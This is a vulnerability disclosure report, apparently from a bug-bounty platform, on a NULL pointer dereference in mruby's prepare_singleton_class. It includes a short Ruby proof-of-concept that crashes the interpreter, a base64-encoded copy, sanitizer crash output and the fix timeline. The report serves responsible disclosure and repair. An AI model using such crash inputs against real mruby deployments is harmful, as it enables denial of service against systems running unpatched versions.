NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Jan 14th 2022


Description

There is a NULL Pointer Dereference in prepare_singleton_class (src/class.c:360:13). This bug has been found on mruby lastest commit (hash 171d32c0071d776207174a40a8fa26def3dbb931) on Ubuntu 20.04 for x86_64/amd64.

Proof of Concept

1.times{b={}
a=0
[**0,m:0]
c={0=>0,nil=>nil}[0]
def m()end
def c.e()end}

Steps to reproduce

1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake

2- Use mruby to execute the poc:

$ echo -ne "MS50aW1lc3tiPXt9CmE9MApbKiowLG06MF0KYz17MD0+MCxuaWw9Pm5pbH1bMF0KZGVmIG0oKWVuZApkZWYgYy5lKCllbmR9Cg==" | base64 -d > poc
$ build/host/bin/mruby ./poc
/home/octa/mruby/src/class.c:360:13: runtime error: member access within null pointer of type 'struct RClass'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/octa/mruby/src/class.c:360:13 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==31695==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000005270f8 bp 0x7ffec6a14090 sp 0x7ffec6a13d80 T0)
==31695==The signal is caused by a READ memory access.
==31695==Hint: address points to the zero page.
    #0 0x5270f8 in prepare_singleton_class /home/octa/mruby/src/class.c:360:13
    #1 0x52688f in mrb_singleton_class_ptr /home/octa/mruby/src/class.c:1685:3
    #2 0x528785 in mrb_singleton_class /home/octa/mruby/src/class.c:1692:22
    #3 0x600757 in mrb_vm_exec /home/octa/mruby/src/vm.c:2918:17
    #4 0x566ee9 in mrb_vm_run /home/octa/mruby/src/vm.c:1128:12
    #5 0x55c339 in mrb_top_run /home/octa/mruby/src/vm.c:3050:12
    #6 0x88b6ce in mrb_load_exec /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6882:7
    #7 0x88d2dc in mrb_load_detect_file_cxt /home/octa/mruby/mrbgems/mruby-compiler/core/parse.y:6925:12
    #8 0x4c9118 in main /home/octa/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347:11
    #9 0x7f46ef9450b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #10 0x41d82d in _start (/home/octa/mruby/build/host/bin/mruby+0x41d82d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/octa/mruby/src/class.c:360:13 in prepare_singleton_class
==31695==ABORTING

Acknowledgements

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

We are processing your report and will contact the mruby team within 24 hours. 4 months ago
We have contacted a member of the mruby team and are waiting to hear back 4 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 4 months ago
Octavio Gianatiempo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on 31fa33 4 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
Octavio
4 months ago

Researcher


Thanks for the quick validation and fix 👍

to join this conversation